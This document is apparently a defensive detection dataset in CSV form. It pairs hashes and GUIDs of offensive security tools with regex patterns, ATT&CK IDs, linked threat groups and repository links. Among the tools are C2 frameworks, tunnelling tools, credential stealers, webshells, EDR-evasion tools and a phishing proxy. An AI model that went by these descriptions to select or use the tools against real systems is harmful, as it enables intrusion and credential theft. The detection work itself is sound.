"*205adce8325494081e929d923abc6585ae541546172483dc147b6ffe48b4f7f6*",".{0,1000}205adce8325494081e929d923abc6585ae541546172483dc147b6ffe48b4f7f6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23062"
"*205cbd1e78fffb666439a6bffd05c0486adcd36e0f237e80619edf8eaed9bf22*",".{0,1000}205cbd1e78fffb666439a6bffd05c0486adcd36e0f237e80619edf8eaed9bf22.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23063"
"*2062837ed59e6bfda4b2b98be75c37f17e6f8e9dec7cce754609cd249b4d02e3*",".{0,1000}2062837ed59e6bfda4b2b98be75c37f17e6f8e9dec7cce754609cd249b4d02e3.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","23065"
"*20641907ff43e97a5b708e9a2a18db7673cd5583c507b84a4b506dae757e21ea*",".{0,1000}20641907ff43e97a5b708e9a2a18db7673cd5583c507b84a4b506dae757e21ea.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","23066"
"*20674c56f95e970818056b474668a43c64db6c414065cd47db9a375128d1cb09*",".{0,1000}20674c56f95e970818056b474668a43c64db6c414065cd47db9a375128d1cb09.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23067"
"*20749471886fbeb543555c1060694f64891eb0a41adae19f747b2c635b2a3a94*",".{0,1000}20749471886fbeb543555c1060694f64891eb0a41adae19f747b2c635b2a3a94.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","23069"
"*20763b3e829f0226ebb2b7e192d8728f2e61a81bf5ee9d59da4c80a078ec087f*",".{0,1000}20763b3e829f0226ebb2b7e192d8728f2e61a81bf5ee9d59da4c80a078ec087f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23070"
"*2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358*",".{0,1000}2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","23071"
"*20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a*",".{0,1000}20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23072"
"*208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037*",".{0,1000}208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23074"
"*2083f424e0d3714f871c2bf8a4f8e38462b28caa43903c062c3df6a03ce8e679*",".{0,1000}2083f424e0d3714f871c2bf8a4f8e38462b28caa43903c062c3df6a03ce8e679.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23075"
"*2084e9586af146731e47db82e3ca1e97b50c63440d4ddf865248dc4740758c61*",".{0,1000}2084e9586af146731e47db82e3ca1e97b50c63440d4ddf865248dc4740758c61.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23076"
"*208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7*",".{0,1000}208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23078"
"*208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a*",".{0,1000}208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23079"
"*209948811ece8dd5cff6fab03402232677c2625fad1272ddc964ed7869b46eeb*",".{0,1000}209948811ece8dd5cff6fab03402232677c2625fad1272ddc964ed7869b46eeb.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23080"
"*20b19292fa127311c14f893694a72b376d27b88c56ea2fb7b9fb816d9e0ab4d6*",".{0,1000}20b19292fa127311c14f893694a72b376d27b88c56ea2fb7b9fb816d9e0ab4d6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23083"
"*20B3AA84-9CA7-43E5-B0CD-8DBA5091DF92*",".{0,1000}20B3AA84\-9CA7\-43E5\-B0CD\-8DBA5091DF92.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#GUIDproject","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","23084"
"*20b948d35e9e730e5aaa00f8de01107af773b93313fed752ae63afcd45353073*",".{0,1000}20b948d35e9e730e5aaa00f8de01107af773b93313fed752ae63afcd45353073.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","23085"
"*20cd0aabd640797f04eaa5c121a282002871288efc8f4915dffd46f75bc21d71*",".{0,1000}20cd0aabd640797f04eaa5c121a282002871288efc8f4915dffd46f75bc21d71.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23088"
"*20ceacaac5215e9a2e5bb82861f1391382fc7cb132c9c57f706b216f5f975b0d*",".{0,1000}20ceacaac5215e9a2e5bb82861f1391382fc7cb132c9c57f706b216f5f975b0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23090"
"*20da3d2ca11e01644815a4f1d0b58fd8544cc03a7e1f5c863ff91700f04c2cbe*",".{0,1000}20da3d2ca11e01644815a4f1d0b58fd8544cc03a7e1f5c863ff91700f04c2cbe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23094"
"*20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f*",".{0,1000}20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23095"
"*20e9054570f81d5aa05864a0bcc292274f2bc48fb593ba26978ede76663c2b6f*",".{0,1000}20e9054570f81d5aa05864a0bcc292274f2bc48fb593ba26978ede76663c2b6f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23097"
"*20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec*",".{0,1000}20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","23098"
"*20ee05dd8552f0e3600b0d597d202e6d9baf1c1f30029d8a4773bb172016ce42*",".{0,1000}20ee05dd8552f0e3600b0d597d202e6d9baf1c1f30029d8a4773bb172016ce42.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","23099"
"*20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f*",".{0,1000}20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23100"
"*20fdeb79608d359d60a1eb6378197f23de9cca8e77e776086335a0cea0c972f2*",".{0,1000}20fdeb79608d359d60a1eb6378197f23de9cca8e77e776086335a0cea0c972f2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","23101"
"*2103fd114d530753c7eadd8561d76ed952863c9d58a64ecf6b3abb160f863db1*",".{0,1000}2103fd114d530753c7eadd8561d76ed952863c9d58a64ecf6b3abb160f863db1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","23102"
"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*",".{0,1000}210A3DB2\-11E3\-4BB4\-BE7D\-554935DCCA43.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","23104"
"*21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500*",".{0,1000}21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23105"
"*211446645fa7a934da99f218cc049cd1c59c68ac2a5da2033eaceff80b1d1c0e*",".{0,1000}211446645fa7a934da99f218cc049cd1c59c68ac2a5da2033eaceff80b1d1c0e.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","23106"
"*2116E6C5-F609-4CA8-B1A1-E87B7BE770A4*",".{0,1000}2116E6C5\-F609\-4CA8\-B1A1\-E87B7BE770A4.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#GUIDproject","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","23107"
"*211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda*",".{0,1000}211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23108"
"*211A4598-B46E-4CD3-BA5A-1EC259D4DB5A*",".{0,1000}211A4598\-B46E\-4CD3\-BA5A\-1EC259D4DB5A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23109"
"*2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc*",".{0,1000}2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23110"
"*2136caf310bb8cefaffbe9fc97ec18efc8fee99c071dbdae5e18840c71632ce7*",".{0,1000}2136caf310bb8cefaffbe9fc97ec18efc8fee99c071dbdae5e18840c71632ce7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23113"
"*2145f05e4090b6b0ef64720547ca85d7c4960b6fd91202a524f99ed832c0b54b*",".{0,1000}2145f05e4090b6b0ef64720547ca85d7c4960b6fd91202a524f99ed832c0b54b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23117"
"*214adf5acd24740909da1a8ee95d629da354cbe23bc2b56d7edf610c84bd6a1d*",".{0,1000}214adf5acd24740909da1a8ee95d629da354cbe23bc2b56d7edf610c84bd6a1d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23120"
"*214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25*",".{0,1000}214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23121"
"*2150D252-AA17-45C2-8981-A6DCF7055CA6*",".{0,1000}2150D252\-AA17\-45C2\-8981\-A6DCF7055CA6.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","23123"
"*21533d1133ecac5dc01a087b7deea5f594b3609d64e96f8e83c3fe458454722c*",".{0,1000}21533d1133ecac5dc01a087b7deea5f594b3609d64e96f8e83c3fe458454722c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23124"
"*2155d44b48c8495225b37a0ebdc72cfecfff3fa95cedf04205e416e4ef36c808*",".{0,1000}2155d44b48c8495225b37a0ebdc72cfecfff3fa95cedf04205e416e4ef36c808.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23125"
"*21567af4f54a515da69211edfabdfda681dd5aa01263c80467394a5c19eee333*",".{0,1000}21567af4f54a515da69211edfabdfda681dd5aa01263c80467394a5c19eee333.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23127"
"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","23128"
"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","23129"
"*21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32*",".{0,1000}21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23130"
"*216244b421d1ebb05ea81496831a2893139d6e2329db77e39cd6a2dc08e703e8*",".{0,1000}216244b421d1ebb05ea81496831a2893139d6e2329db77e39cd6a2dc08e703e8.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","23131"
"*216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79*",".{0,1000}216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23132"
"*2164E6D9-6023-4932-A08F-7A5C15E2CA0B*",".{0,1000}2164E6D9\-6023\-4932\-A08F\-7A5C15E2CA0B.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","23133"
"*216767025356ffaa54815bf698254810253efcd10feddfab82e7f6ed991d553c*",".{0,1000}216767025356ffaa54815bf698254810253efcd10feddfab82e7f6ed991d553c.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23135"
"*2170a03a337a89bb3b6a02035ae85946815f8643897ded40fc0a2c29e2e5a960*",".{0,1000}2170a03a337a89bb3b6a02035ae85946815f8643897ded40fc0a2c29e2e5a960.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","23137"
"*21870c033ee041fa83e39818f3f23a51c1f994344f15f1f2b95912c013ad77ff*",".{0,1000}21870c033ee041fa83e39818f3f23a51c1f994344f15f1f2b95912c013ad77ff.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23139"
